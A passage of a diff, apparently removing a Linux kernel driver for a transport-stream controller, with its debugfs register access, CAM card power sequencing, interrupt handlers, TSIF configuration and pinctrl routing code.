-- {"tsc_false_cd_counter", S_IRUGO, TSC_FALSE_CD},
-- {"tsc_cicam_tsif", TSC_S_RW, TSC_CICAM_TSIF},
--};
--
--static const struct debugfs_entry tsc_regs_8[] = {
-- {"tsc_cam_rd_data", S_IRUGO, TSC_CAM_RD_DATA},
-- {"tsc_irq_stat", S_IRUGO, TSC_STAT},
-- {"tsc_irq_ena", TSC_S_RW, TSC_IRQ_ENA},
-- {"tsc_irq_clr", TSC_S_RW, TSC_IRQ_CLR},
-- {"tsc_ena_hw_poll", TSC_S_RW, TSC_CIP_CFG},
-- {"tsc_card_stat", TSC_S_RW, TSC_CD_STAT},
-- {"tsc_false_cd_counter_clr", TSC_S_RW, TSC_FALSE_CD_CLR},
-- {"tsc_last_error_resp", S_IRUGO, TSC_RESP_ERR},
--};
--
--/* debugfs settings */
--static int debugfs_iomem_set(void *data, u64 val)
--{
-- if (mutex_lock_interruptible(&tsc_device->mutex))
-- return -ERESTARTSYS;
--
-- if (!tsc_device->num_device_open) {
-- mutex_unlock(&tsc_device->mutex);
-- return -ENXIO;
-- }
--
-- mutex_unlock(&tsc_device->mutex);
--
-- writel_relaxed(val, data);
-- wmb();
--
-- return 0;
--}
--
--static int debugfs_iomem_get(void *data, u64 *val)
--{
-- if (mutex_lock_interruptible(&tsc_device->mutex))
-- return -ERESTARTSYS;
--
-- if (!tsc_device->num_device_open) {
-- mutex_unlock(&tsc_device->mutex);
-- return -ENXIO;
-- }
--
-- mutex_unlock(&tsc_device->mutex);
--
-- *val = readl_relaxed(data);
--
-- return 0;
--}
--
--DEFINE_SIMPLE_ATTRIBUTE(fops_iomem_x32, debugfs_iomem_get,
-- debugfs_iomem_set, "0x%08llX");
--DEFINE_SIMPLE_ATTRIBUTE(fops_iomem_x16, debugfs_iomem_get,
-- debugfs_iomem_set, "0x%04llX");
--DEFINE_SIMPLE_ATTRIBUTE(fops_iomem_x8, debugfs_iomem_get,
-- debugfs_iomem_set, "0x%02llX");
--
--/**
-- * tsc_debugfs_init() - TSC device debugfs initialization.
-- */
--static void tsc_debugfs_init(void)
--{
-- int i;
-- struct dentry *dentry;
-- void __iomem *base = tsc_device->base;
--
-- tsc_device->debugfs_entry = debugfs_create_dir("tsc", NULL);
-- if (!tsc_device->debugfs_entry)
-- return;
-- dentry = debugfs_create_dir("regs", tsc_device->debugfs_entry);
-- if (dentry) {
-- for (i = 0; i < ARRAY_SIZE(tsc_regs_32); i++) {
-- debugfs_create_file(
-- tsc_regs_32[i].name,
-- tsc_regs_32[i].mode,
-- dentry,
-- base + tsc_regs_32[i].offset,
-- &fops_iomem_x32);
-- }
-- for (i = 0; i < ARRAY_SIZE(tsc_regs_16); i++) {
-- debugfs_create_file(
-- tsc_regs_16[i].name,
-- tsc_regs_16[i].mode,
-- dentry,
-- base + tsc_regs_16[i].offset,
-- &fops_iomem_x16);
-- }
-- for (i = 0; i < ARRAY_SIZE(tsc_regs_8); i++) {
-- debugfs_create_file(
-- tsc_regs_8[i].name,
-- tsc_regs_8[i].mode,
-- dentry,
-- base + tsc_regs_8[i].offset,
-- &fops_iomem_x8);
-- }
-- }
--}
--
--/**
-- * tsc_debugfs_exit() - TSC device debugfs teardown.
-- */
--static void tsc_debugfs_exit(void)
--{
-- debugfs_remove_recursive(tsc_device->debugfs_entry);
-- tsc_device->debugfs_entry = NULL;
--}
--
--/**
-- * tsc_update_hw_card_status() - Update the hw_status according to the HW reg.
-- *
-- * Read the register indicating the card status (inserted, removed, error) and
-- * update the tsc_device->hw_card_status accordingly.
-- */
--static void tsc_update_hw_card_status(void)
--{
-- u32 cd_reg, card_status = 0;
--
-- cd_reg = readl_relaxed(tsc_device->base + TSC_CD_STAT);
-- card_status = GETL_BITS(cd_reg, TSC_CD_BEG, TSC_CD_END);
-- switch (card_status) {
-- case TSC_CD_STAT_INSERT:
-- tsc_device->hw_card_status = TSC_CARD_STATUS_DETECTED;
-- break;
-- case TSC_CD_STAT_ERROR1:
-- case TSC_CD_STAT_ERROR2:
-- tsc_device->hw_card_status = TSC_CARD_STATUS_FAILURE;
-- break;
-- case TSC_CD_STAT_REMOVE:
-- tsc_device->hw_card_status = TSC_CARD_STATUS_NOT_DETECTED;
-- break;
-- }
--}
--
--/**
-- * tsc_card_power_down() - power down card interface upon removal.
-- *
-- * Power down the card by disable VPP, disable pins in the TLMM, assert the
-- * reset line and disable the level-shifters. This function assumes the spinlock
-- * of ci device is already taken.
-- *
-- * Return 0 on finish, error value if interrupted while acquiring a mutex.
-- */
--static int tsc_card_power_down(void)
--{
-- int ret = 0;
-- struct pinctrl_info *ppinctrl = &tsc_device->pinctrl_info;
-- struct pinctrl_current_state *pcurr_state = &ppinctrl->curr_state;
-- int reset_gpio = tsc_device->reset_cam_gpio;
-- u32 reg = 0;
--
-- /* Clearing CAM TSIF OE to disable I/O CAM transactions */
-- CLEAR_BIT(TSC_CICAM_TSIF_OE_OFFS, reg);
-- writel_relaxed(reg, tsc_device->base + TSC_CICAM_TSIF);
--
-- /* Assert the reset line */
-- ret = gpio_direction_output(reset_gpio, 1); /* assert */
-- if (ret != 0)
-- pr_err("%s: Failed to assert the reset CAM GPIO\n", __func__);
--
-- /* Disable all the level-shifters */
-- /* TODO: call mpq_standby_pcmcia_master0_set(0) after MCU mainlined */
-- if (ret != 0)
-- pr_err("%s: error disable master0 level-shifters. ret value = %d\n",
-- __func__, ret);
-- /* TODO: call mpq_standby_pcmcia_master1_set(1) after MCU mainlined */
-- if (ret != 0)
-- pr_err("%s: error disable master1 level-shifters.
ret value = %d\n",
-- __func__, ret);
--
-- /* Power-down the card */
-- /* TODO: call mpq_standby_pcmcia_vpp_set(1) after MCU mainlined */
-- if (ret != 0)
-- pr_err("%s: error disabling VPP. ret value = %d\n", __func__,
-- ret);
-- /* Wait 10msec until VPP become stable */
-- usleep(10000);
--
-- /* Disable pins in the TLMM */
-- if (mutex_lock_interruptible(&tsc_device->mutex))
-- return -ERESTARTSYS;
--
-- if (pcurr_state->ts0 && pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->dual_ts);
-- else if (pcurr_state->ts0 && !pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts0);
-- else if (!pcurr_state->ts0 && pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts1);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->disable);
-- if (ret != 0)
-- pr_err("%s: error changing PCMCIA pins upon card removal. ret value = %d\n",
-- __func__, ret);
-- else
-- pcurr_state->pcmcia_state = PCMCIA_STATE_DISABLE;
--
-- mutex_unlock(&tsc_device->mutex);
--
-- return 0;
--}
--
--/**
-- * tsc_card_power_up() - power up card interface upon insertion.
-- *
-- * Power up the card by open VPP, enable pins in the TLMM, deassert the reset
-- * line and enable the level-shifters. This function assumes the spinlock of ci
-- * device is already taken.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_card_power_up(void)
--{
-- int ret = 0;
-- struct pinctrl_info *ppinctrl = &tsc_device->pinctrl_info;
-- struct pinctrl_current_state *pcurr_state = &ppinctrl->curr_state;
-- int reset_gpio = tsc_device->reset_cam_gpio;
--
-- /* Power-up the card */
-- /* TODO: call mpq_standby_pcmcia_vpp_set(1) after MCU mainlined */
-- if (ret != 0) {
-- pr_err("%s: error setting VPP.
ret value = %d\n", __func__,
-- ret);
-- return ret;
-- }
-- /* Wait 10msec until VPP become stable */
-- usleep(10000);
--
-- /* Enable pins in the TLMM */
-- if (mutex_lock_interruptible(&tsc_device->mutex))
-- return -ERESTARTSYS;
--
-- if (pcurr_state->ts0 && pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->dual_ts_pc_card);
-- else if (pcurr_state->ts0 && !pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts0_pc_card);
-- else if (!pcurr_state->ts0 && pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts1_pc_card);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->pc_card);
-- if (ret != 0) {
-- pr_err("%s: error changing PCMCIA pins upon card insertion. ret value = %d\n",
-- __func__, ret);
-- mutex_unlock(&tsc_device->mutex);
-- goto err;
-- } else {
-- pcurr_state->pcmcia_state = PCMCIA_STATE_PC_CARD;
-- }
-- mutex_unlock(&tsc_device->mutex);
--
-- /* Release the reset line */
-- ret = gpio_direction_output(reset_gpio, 0); /* Deassert */
-- if (ret != 0) {
-- pr_err("%s: Failed to deassert the reset CAM GPIO\n", __func__);
-- goto err;
-- }
--
-- /* Enable level-shifters for all pins */
-- /* TODO: call mpq_standby_pcmcia_master0_set(0) after MCU mainlined */
-- if (ret != 0) {
-- pr_err("%s: error setting master0 level-shifters. ret value = %d\n",
-- __func__, ret);
-- goto err;
-- }
-- /* TODO: call mpq_standby_pcmcia_master1_set(0) after MCU mainlined */
-- if (ret != 0) {
-- pr_err("%s: error setting master1 level-shifters. ret value = %d\n",
-- __func__, ret);
-- goto err;
-- }
--
-- /* Wait 20msec at the end of the power-up sequence */
-- usleep(20000);
--
-- return ret;
--
--err:
-- tsc_card_power_down();
-- return ret;
--}
--
--/************************** Interrupt handlers **************************/
--/**
-- * tsc_card_detect_irq_thread_handler() - TSC card detect interrupt handler.
-- *
-- * @irq: Interrupt number.
-- * @dev: TSC device.
-- *
-- * The handler is executed on a thread context, not in the interrupt context
-- * (can take a mutex and sleep).
-- * Read the card detection status from the register and initiate a power-up/down
-- * sequence accordingly. The sequence will occur only if a change is needed in
-- * the current power state.
-- *
-- */
--static irqreturn_t tsc_card_detect_irq_thread_handler(int irq, void *dev)
--{
-- int ret = 0;
-- struct tsc_ci_chdev *tsc_ci;
-- unsigned long flags = 0;
--
-- tsc_ci = &tsc_device->ci_chdev;
--
-- mutex_lock(&tsc_ci->mutex);
--
-- tsc_update_hw_card_status();
--
-- /* waking-up ci poll queue */
-- wake_up_interruptible(&tsc_ci->poll_queue);
--
-- /* If in the middle of a data transaction- aborting the transaction */
-- if (tsc_ci->data_busy && tsc_device->hw_card_status ==
-- TSC_CARD_STATUS_NOT_DETECTED) {
-- spin_lock_irqsave(&tsc_ci->spinlock, flags);
-- tsc_ci->transaction_state = TRANSACTION_CARD_REMOVED;
-- spin_unlock_irqrestore(&tsc_ci->spinlock, flags);
-- complete_all(&tsc_ci->transaction_complete);
-- }
--
-- if (tsc_device->hw_card_status == TSC_CARD_STATUS_DETECTED &&
-- !tsc_device->card_power) {
-- ret = tsc_card_power_up();
-- if (ret != 0)
-- pr_err("%s: card power-up failed\n", __func__);
-- else
-- tsc_device->card_power = true;
-- } else if (tsc_device->hw_card_status == TSC_CARD_STATUS_NOT_DETECTED &&
-- tsc_device->card_power) {
-- tsc_card_power_down();
-- /*
-- * In case something failed during the power down, the sequence
-- * continue and the status of the card power is considered as
-- * powered down.
-- */
-- tsc_device->card_power = false;
-- }
--
-- mutex_unlock(&tsc_ci->mutex);
--
-- return IRQ_HANDLED;
--}
--
--/**
-- * tsc_cam_cmd_irq_handler() - TSC CAM interrupt handler.
-- *
-- * @irq: Interrupt number.
-- * @dev: TSC device.
-- *
-- * Handle TSC CAM HW interrupt.
Handle the CAM transaction interrupts by waking
-- * up the completion sync object, handle rate mismatch interrupt by waking-up
-- * the TSC Mux poll wait-queue and clear the interrupts received.
-- *
-- * Return IRQ_HANDLED.
-- */
--static irqreturn_t tsc_cam_cmd_irq_handler(int irq, void *dev)
--{
-- struct tsc_ci_chdev *tsc_ci;
-- struct tsc_mux_chdev *tsc_mux;
-- unsigned long flags;
-- u32 stat_reg, ena_reg;
--
-- tsc_ci = &tsc_device->ci_chdev;
-- tsc_mux = &tsc_device->mux_chdev;
--
-- stat_reg = readl_relaxed(tsc_device->base + TSC_STAT);
--
-- /* Handling transaction interrupts */
-- if (TEST_BIT(CAM_IRQ_ERR_OFFS, stat_reg) ||
-- TEST_BIT(CAM_IRQ_EOT_OFFS, stat_reg)) {
-- spin_lock_irqsave(&tsc_ci->spinlock, flags);
--
-- if (TEST_BIT(CAM_IRQ_EOT_OFFS, stat_reg))
-- tsc_ci->transaction_state = TRANSACTION_SUCCESS;
-- else
-- tsc_ci->transaction_state = TRANSACTION_ERROR;
--
-- spin_unlock_irqrestore(&tsc_ci->spinlock, flags);
-- complete_all(&tsc_ci->transaction_complete);
-- }
--
-- /* Handling rate mismatch interrupt */
-- if (TEST_BIT(CAM_IRQ_RATE_MISMATCH_OFFS, stat_reg)) {
-- spin_lock_irqsave(&tsc_mux->spinlock, flags);
--
-- /* Disabling rate mismatch interrupt */
-- ena_reg = readl_relaxed(tsc_device->base + TSC_IRQ_ENA);
-- CLEAR_BIT(CAM_IRQ_RATE_MISMATCH_OFFS, ena_reg);
-- writel_relaxed(ena_reg, tsc_device->base + TSC_IRQ_ENA);
--
-- /* Setting internal flag for poll */
-- tsc_mux->rate_interrupt = true;
--
-- spin_unlock_irqrestore(&tsc_mux->spinlock, flags);
-- /* waking-up mux poll queue */
-- wake_up_interruptible(&tsc_mux->poll_queue);
-- }
--
-- /* Clearing all the interrupts received */
-- writel_relaxed(stat_reg, tsc_device->base + TSC_IRQ_CLR);
--
-- /*
-- * Before returning IRQ_HANDLED to the generic interrupt handling
-- * framework need to make sure all operations including clearing of
-- * interrupt status registers in the hardware is performed.
-- * Thus a barrier after clearing the interrupt status register
-- * is required to guarantee that the interrupt status register has
-- * really been cleared by the time we return from this handler.
-- */
-- wmb();
--
-- return IRQ_HANDLED;
--}
--
--/************************** Internal functions **************************/
--
--/**
-- * tsc_set_cicam_clk() - Setting the rate of the TS from the TSC to the CAM
-- *
-- * @arg: The argument received from the user-space via set rate IOCTL.
-- * It is the value of the requested rate in MHz.
-- *
-- * Setting the rate of the cicam_ts_clk clock, with one of the valid clock
-- * frequencies. The arg value given is rounded to the nearest frequency.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_set_cicam_clk(unsigned long arg)
--{
-- int ret;
--
-- if (arg <= 8)
-- ret = clk_set_rate(tsc_device->cicam_ts_clk,
-- CICAM_CLK_RATE_7MHZ);
-- else if (arg <= 11)
-- ret = clk_set_rate(tsc_device->cicam_ts_clk,
-- CICAM_CLK_RATE_9MHZ);
-- else
-- ret = clk_set_rate(tsc_device->cicam_ts_clk,
-- CICAM_CLK_RATE_12MHZ);
-- return ret;
--}
--
--/**
-- * tsc_enable_rate_irq() - Enabling the rate mismatch interrupt.
-- *
-- * @tsc_mux: TSC Mux device.
-- *
-- * Setting the bit of this interrupt in the register that controls which
-- * interrupts are enabled.
-- */
--static void tsc_enable_rate_irq(struct tsc_mux_chdev *tsc_mux)
--{
-- unsigned long flags;
-- u32 ena_reg = 0;
--
-- spin_lock_irqsave(&tsc_mux->spinlock, flags);
--
-- /* Setting the bit to start receiving rate mismatch interrupt again */
-- ena_reg = readl_relaxed(tsc_device->base + TSC_IRQ_ENA);
-- SET_BIT(CAM_IRQ_RATE_MISMATCH_OFFS, ena_reg);
-- writel_relaxed(ena_reg, tsc_device->base + TSC_IRQ_ENA);
--
-- spin_unlock_irqrestore(&tsc_mux->spinlock, flags);
--}
--
--/**
-- * tsc_config_tsif() - Modifying TSIF configuration.
-- *
-- * @tsc_mux: TSC Mux device.
-- * @tsif_params: TSIF parameters received from the user-space via IOCTL.
-- *
-- * Update the specified TSIF parameters according to the values in tsif_params.
-- * The update is done by modifying a HW register.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_config_tsif(struct tsc_mux_chdev *tsc_mux,
-- struct tsc_tsif_params *tsif_params)
--{
-- int ret = 0;
-- u32 reg;
-- int reg_internal_offs;
-- u32 reg_addr_offs;
--
-- switch (tsif_params->source) {
-- case TSC_SOURCE_EXTERNAL0:
-- reg_internal_offs = 0;
-- reg_addr_offs = TSC_IN_IFC_EXT;
-- break;
-- case TSC_SOURCE_EXTERNAL1:
-- reg_internal_offs = 16;
-- reg_addr_offs = TSC_IN_IFC_EXT;
-- break;
-- case TSC_SOURCE_INTERNAL:
-- reg_internal_offs = 0;
-- reg_addr_offs = TSC_IN_IFC_CFG_INT;
-- break;
-- case TSC_SOURCE_CICAM:
-- reg_internal_offs = 16;
-- reg_addr_offs = TSC_IN_IFC_CFG_INT;
-- break;
-- default:
-- pr_err("%s: unidentified source parameter\n", __func__);
-- ret = -EINVAL;
-- goto err;
-- }
--
--
-- reg = readl_relaxed(tsc_device->base + reg_addr_offs);
--
-- /* Modifying TSIF settings in the register value */
-- (tsif_params->clock_polarity ?
-- SET_BIT((reg_internal_offs + TSIF_CLK_POL_OFFS), reg) :
-- CLEAR_BIT((reg_internal_offs + TSIF_CLK_POL_OFFS), reg));
-- (tsif_params->data_polarity ?
-- SET_BIT(((reg_internal_offs + TSIF_DATA_POL_OFFS)), reg) :
-- CLEAR_BIT((reg_internal_offs + TSIF_DATA_POL_OFFS), reg));
-- (tsif_params->start_polarity ?
-- SET_BIT((reg_internal_offs + TSIF_START_POL_OFFS), reg) :
-- CLEAR_BIT((reg_internal_offs + TSIF_START_POL_OFFS), reg));
-- (tsif_params->valid_polarity ?
-- SET_BIT((reg_internal_offs + TSIF_VALID_POL_OFFS), reg) :
-- CLEAR_BIT((reg_internal_offs + TSIF_VALID_POL_OFFS), reg));
-- (tsif_params->error_polarity ?
-- SET_BIT((reg_internal_offs + TSIF_ERROR_POL_OFFS), reg) :
-- CLEAR_BIT((reg_internal_offs + TSIF_ERROR_POL_OFFS), reg));
-- (tsif_params->data_type ?
-- SET_BIT((reg_internal_offs + TSIF_SER_PAR_OFFS), reg) :
-- CLEAR_BIT((reg_internal_offs + TSIF_SER_PAR_OFFS), reg));
-- reg &= ~(0x3 << TSIF_REC_MODE_OFFS);
-- reg |= (tsif_params->receive_mode << TSIF_REC_MODE_OFFS);
-- (tsif_params->data_swap ?
-- SET_BIT((reg_internal_offs + TSIF_DATA_SWAP_OFFS), reg) :
-- CLEAR_BIT((reg_internal_offs + TSIF_DATA_SWAP_OFFS), reg));
-- (tsif_params->set_error ?
-- SET_BIT((reg_internal_offs + TSIF_ERR_INSERT_OFFS), reg) :
-- CLEAR_BIT((reg_internal_offs + TSIF_ERR_INSERT_OFFS), reg));
--
-- /* Writing the new settings to the register */
-- writel_relaxed(reg, tsc_device->base + reg_addr_offs);
--
--err:
-- return ret;
--}
--
--/**
-- * tsc_suspend_ts_pins() - Suspend TS-in pins
-- *
-- * @source: The TSIF to configure.
-- *
-- * Config the TLMM pins of a TSIF as TS-in pins in sleep state according to
-- * the current pinctrl configuration of the other pins.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_suspend_ts_pins(enum tsc_source source)
--{
-- int ret = 0;
-- struct pinctrl_info *ppinctrl = &tsc_device->pinctrl_info;
-- struct pinctrl_current_state *pcurr_state = &ppinctrl->curr_state;
--
-- if (mutex_lock_interruptible(&tsc_device->mutex))
-- return -ERESTARTSYS;
--
-- if (source == TSC_SOURCE_EXTERNAL0) {
-- if (!ppinctrl->is_ts0) {
-- pr_err("%s: No TS0-in pinctrl definitions were found in the TSC devicetree\n",
-- __func__);
-- mutex_unlock(&tsc_device->mutex);
-- return -EPERM;
-- }
--
-- /* Transition from current pinctrl state to curr + ts0 sleep */
-- switch (pcurr_state->pcmcia_state) {
-- case PCMCIA_STATE_DISABLE:
-- if (pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts1);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->disable);
-- break;
-- case PCMCIA_STATE_PC_CARD:
-- if (pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts1_pc_card);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
--
ppinctrl->pc_card);
-- break;
-- case PCMCIA_STATE_CI_CARD:
-- if (pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts1_ci_card);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ci_card);
-- break;
-- case PCMCIA_STATE_CI_PLUS:
-- if (pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts1_ci_plus);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ci_plus);
-- break;
-- }
-- } else { /* source == TSC_SOURCE_EXTERNAL1 */
-- if (!ppinctrl->is_ts1) {
-- pr_err("%s: No TS1-in pinctrl definitions were found in the TSC devicetree\n",
-- __func__);
-- mutex_unlock(&tsc_device->mutex);
-- return -EPERM;
-- }
--
-- /* Transition from current pinctrl state to curr + ts1 sleep */
-- switch (pcurr_state->pcmcia_state) {
-- case PCMCIA_STATE_DISABLE:
-- if (pcurr_state->ts0)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts0);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->disable);
-- break;
-- case PCMCIA_STATE_PC_CARD:
-- if (pcurr_state->ts0)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts0_pc_card);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->pc_card);
-- break;
-- case PCMCIA_STATE_CI_CARD:
-- if (pcurr_state->ts0)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts0_ci_card);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ci_card);
-- break;
-- case PCMCIA_STATE_CI_PLUS:
-- if (pcurr_state->ts0)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts0_ci_plus);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ci_plus);
-- break;
-- }
-- }
--
-- if (ret != 0) {
-- pr_err("%s: error disabling TS-in pins.
ret value = %d\n",
-- __func__, ret);
-- mutex_unlock(&tsc_device->mutex);
-- return -EINVAL;
-- }
--
-- /* Update the current pinctrl state in the internal struct */
-- if (source == TSC_SOURCE_EXTERNAL0)
-- pcurr_state->ts0 = false;
-- else
-- pcurr_state->ts1 = false;
--
-- mutex_unlock(&tsc_device->mutex);
--
-- return 0;
--}
--
--/**
-- * tsc_activate_ts_pins() - Activate TS-in pins
-- *
-- * @source: The TSIF to configure.
-- *
-- * Config the TLMM pins of a TSIF as TS-in pins in active state according to
-- * the current pinctrl configuration of the other pins
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_activate_ts_pins(enum tsc_source source)
--{
-- int ret = 0;
-- struct pinctrl_info *ppinctrl = &tsc_device->pinctrl_info;
-- struct pinctrl_current_state *pcurr_state = &ppinctrl->curr_state;
--
-- if (mutex_lock_interruptible(&tsc_device->mutex))
-- return -ERESTARTSYS;
--
-- if (source == TSC_SOURCE_EXTERNAL0) {
-- if (!ppinctrl->is_ts0) {
-- pr_err("%s: No TS0-in pinctrl definitions were found in the TSC devicetree\n",
-- __func__);
-- mutex_unlock(&tsc_device->mutex);
-- return -EPERM;
-- }
--
-- /* Transition from current pinctrl state to curr + ts0 active */
-- switch (pcurr_state->pcmcia_state) {
-- case PCMCIA_STATE_DISABLE:
-- if (pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->dual_ts);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts0);
-- break;
-- case PCMCIA_STATE_PC_CARD:
-- if (pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->dual_ts_pc_card);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts0_pc_card);
-- break;
-- case PCMCIA_STATE_CI_CARD:
-- if (pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->dual_ts_ci_card);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts0_ci_card);
-- break;
-- case PCMCIA_STATE_CI_PLUS:
-- if (pcurr_state->ts1)
-- ret =
pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->dual_ts_ci_plus);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts0_ci_plus);
-- break;
-- }
-- } else { /* source == TSC_SOURCE_EXTERNAL1 */
-- if (!ppinctrl->is_ts1) {
-- pr_err("%s: No TS1-in pinctrl definitions were found in the TSC devicetree\n",
-- __func__);
-- mutex_unlock(&tsc_device->mutex);
-- return -EPERM;
-- }
--
-- /* Transition from current pinctrl state to curr + ts1 active */
-- switch (pcurr_state->pcmcia_state) {
-- case PCMCIA_STATE_DISABLE:
-- if (pcurr_state->ts0)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->dual_ts);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts1);
-- break;
-- case PCMCIA_STATE_PC_CARD:
-- if (pcurr_state->ts0)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->dual_ts_pc_card);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts1_pc_card);
-- break;
-- case PCMCIA_STATE_CI_CARD:
-- if (pcurr_state->ts0)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->dual_ts_ci_card);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts1_ci_card);
-- break;
-- case PCMCIA_STATE_CI_PLUS:
-- if (pcurr_state->ts0)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->dual_ts_ci_plus);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts1_ci_plus);
-- break;
-- }
-- }
--
-- if (ret != 0) {
-- pr_err("%s: error activating TS-in pins. ret value = %d\n",
-- __func__, ret);
-- mutex_unlock(&tsc_device->mutex);
-- return -EINVAL;
-- }
--
-- /* Update the current pinctrl state in the internal struct */
-- if (source == TSC_SOURCE_EXTERNAL0)
-- pcurr_state->ts0 = true;
-- else
-- pcurr_state->ts1 = true;
--
-- mutex_unlock(&tsc_device->mutex);
--
-- return 0;
--}
--
--/**
-- * tsc_enable_disable_tsif() - Enable/disable a TSIF.
-- *
-- * @tsc_mux: TSC Mux device.
-- * @source: The TSIF to enable or disable.
-- * @operation: The operation to perform: 0- enable, 1- disable.
-- *
-- * Enable or disable the specified TSIF, which consequently will block the TS
-- * flowing through this TSIF. The update is done by modifying a HW register.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_enable_disable_tsif(struct tsc_mux_chdev *tsc_mux,
-- enum tsc_source source, int operation)
--{
-- int ret = 0;
-- u32 reg;
-- u32 addr_offs;
-- int reg_offs;
-- int curr_disable_state;
--
-- switch (source) {
-- case TSC_SOURCE_EXTERNAL0:
-- reg_offs = 0;
-- addr_offs = TSC_IN_IFC_EXT;
-- break;
-- case TSC_SOURCE_EXTERNAL1:
-- reg_offs = 16;
-- addr_offs = TSC_IN_IFC_EXT;
-- break;
-- case TSC_SOURCE_INTERNAL:
-- reg_offs = 0;
-- addr_offs = TSC_IN_IFC_CFG_INT;
-- break;
-- case TSC_SOURCE_CICAM:
-- reg_offs = 16;
-- addr_offs = TSC_IN_IFC_CFG_INT;
-- break;
-- default:
-- pr_err("%s: unidentified source parameter\n", __func__);
-- ret = -EINVAL;
-- return ret;
-- }
--
-- /* Reading the current enable/disable state from the register */
-- reg = readl_relaxed(tsc_device->base + addr_offs);
-- curr_disable_state = GETL_BITS(reg, TSIF_DISABLE_OFFS + reg_offs,
-- TSIF_DISABLE_OFFS + reg_offs);
-- /* If the current state equals the new state- return success */
-- if (curr_disable_state == operation)
-- return ret;
--
-- if (operation == TSIF_INPUT_DISABLE) {
-- if (source == TSC_SOURCE_EXTERNAL0 ||
-- source == TSC_SOURCE_EXTERNAL1) {
-- /* Disabling the TS-in pins in the TLMM */
-- ret = tsc_suspend_ts_pins(source);
-- if (ret != 0) {
-- pr_err("%s: Error suspending TS-in pins",
-- __func__);
-- return ret;
-- }
-- }
-- SET_BIT((reg_offs + TSIF_DISABLE_OFFS), reg);
-- } else {
-- if (source == TSC_SOURCE_EXTERNAL0 ||
-- source == TSC_SOURCE_EXTERNAL1) {
-- /* Enabling the TS-in pins in the TLMM */
-- ret = tsc_activate_ts_pins(source);
-- if (ret != 0) {
-- pr_err("%s: Error activating TS-in pins",
-- __func__);
-- return ret;
-- }
-- }
-- CLEAR_BIT((reg_offs +
TSIF_DISABLE_OFFS), reg);
-- }
--
-- /* Writing back to the reg the enable/disable of the TSIF */
-- writel_relaxed(reg, tsc_device->base + addr_offs);
--
-- return ret;
--}
--
--/**
-- * tsc_route_mux() - Configuring one of the TSC muxes.
-- *
-- * @tsc_mux: TSC Mux device.
-- * @source: The requested TS source to be selected by the mux.
-- * @dest: The requested mux.
-- *
-- * Configuring the specified mux to pass the TS indicated by the src parameter.
-- * The update is done by modifying a HW register.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_route_mux(struct tsc_mux_chdev *tsc_mux, enum tsc_source source,
-- enum tsc_dest dest)
--{
-- int ret = 0;
-- u32 mux_cfg_reg;
-- int src_val;
--
-- switch (source) {
-- case TSC_SOURCE_EXTERNAL0:
-- src_val = MUX_EXTERNAL_DEMOD_0;
-- break;
-- case TSC_SOURCE_EXTERNAL1:
